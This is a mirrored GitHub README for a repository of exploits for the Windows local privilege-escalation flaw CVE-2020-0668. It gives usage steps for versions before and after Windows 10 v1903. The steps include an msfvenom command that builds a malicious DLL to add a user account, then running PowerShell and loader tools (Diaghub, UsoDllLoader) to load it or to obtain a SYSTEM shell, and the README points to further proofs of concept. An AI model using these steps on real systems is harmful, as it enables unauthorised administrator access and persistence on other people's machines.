Coder Social home page Coder Social logo

cve-2020-0668's Introduction

CVE-2020-0668

Make CVE-2020-0668 exploit work for version < win10 v1903 and version >= win10 v1903

Diaghub Exploit (< v1903)

powershell exploit works on version < win10 v1903 with Diaghub.

Usage

  • STEP 1:generate evil.dll with msfvenom
    • example add a user : msfvenom -p windows/x64/exec CMD="net user test test /add" -f dll > evil.dll
  • STEP 2:execute exp.ps1 with powershell
  • STEP 3:execute Diaghub.exe C:\ProgramData evil.dll to load dll and add user.

Diaghub

UsoDllLoader Exploit (>= v1903)

powershell exploit works on version >= win10 v1903 with UsoDllLoader.

Usage

  • STEP 1 : execute exp.ps1 with powershell
  • STEP 2 : execute UsoDllLoader.exe to get a system shell

exploit

Other Exp or PoC

SysTracingPoc Exp

A x86 release version of SysTracingPoc for issue,exploit works on version >= win10 v1903 because of UsoLoadDll.

RedCursorSecurityConsulting PoC

A .net PoC. If you take a look at C:\Windows\System32\evil.dll and rename it as evil.txt.

You will find it not a dll file. Only tracing log in it.

Nan3r PoC

A powershell PoC. Also only tracing log in evil.dll.

cve-2020-0668's People

Contributors

ycdxsb avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.